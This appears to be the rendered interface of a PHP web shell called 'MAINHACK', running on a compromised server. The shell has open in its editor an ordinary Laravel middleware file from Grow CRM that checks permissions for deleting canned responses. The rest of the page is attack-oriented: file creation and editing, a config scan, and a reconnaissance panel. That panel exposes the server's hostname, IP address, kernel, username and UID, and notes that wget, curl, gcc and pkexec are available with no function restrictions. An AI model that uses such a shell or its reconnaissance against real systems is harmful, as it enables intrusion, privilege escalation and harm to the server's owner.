[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Destroy.php
<?php /** -------------------------------------------------------------------------------- * This middleware class handles [destroy] precheck processes for template * * @package Grow CRM * @author NextLoop *----------------------------------------------------------------------------------*/ namespace App\Http\Middleware\Canned; use Closure; use Log; class Destroy { /** * This 'bulk actions' middleware does the following * 1. If the request was for a sinle item * - single item actions must have a query string '?id=123' * - this id will be merged into the expected 'ids' request array (just as if it was a bulk request) * 2. loop through all the 'ids' that are in the post request * * HTML for the checkbox is expected to be in this format: * <input type="checkbox" name="ids[{{ $canned->canned_id }}]" * * @param \Illuminate\Http\Request $request * @param \Closure $next * @return mixed */ public function handle($request, Closure $next) { //NOTE: F4 change [action-bar] to the action name e.g. [change-status] //for a single item request - merge into an $ids[x] array and set as if checkox is selected (on) if (is_numeric($request->route('canned'))) { $ids[$request->route('canned')] = 'on'; request()->merge([ 'ids' => $ids, ]); } if (auth()->user()->is_client) { abort(409); } //loop through each canned and check permissions if (is_array(request('ids'))) { //validate each item in the list exists foreach (request('ids') as $id => $value) { //only checked items if ($value == 'on') { //validate if (!$canned = \App\Models\Canned::Where('canned_id', $id)->first()) { abort(409, __('lang.one_of_the_selected_items_nolonger_exists')); } } } //permission: does user have permission edit canned if (auth()->user()->is_team) { if (auth()->user()->role->role_canned == 'no') { if ($canned->canned_visibility == 'public') { abort(403, __('lang.permission_denied_for_this_item') . " - #$id"); } } } } else { //no items were passed with this request Log::error("no items were sent with this request", ['process' => '[canned][action-bar]', 'ref' => config('app.debug_ref'), 'function' => __function__, 'file' => basename(__FILE__), 'line' => __line__, 'path' => __file__, 'canned id' => $canned_id ?? '']); abort(409); } //all is on - passed return $next($request); } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.84 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002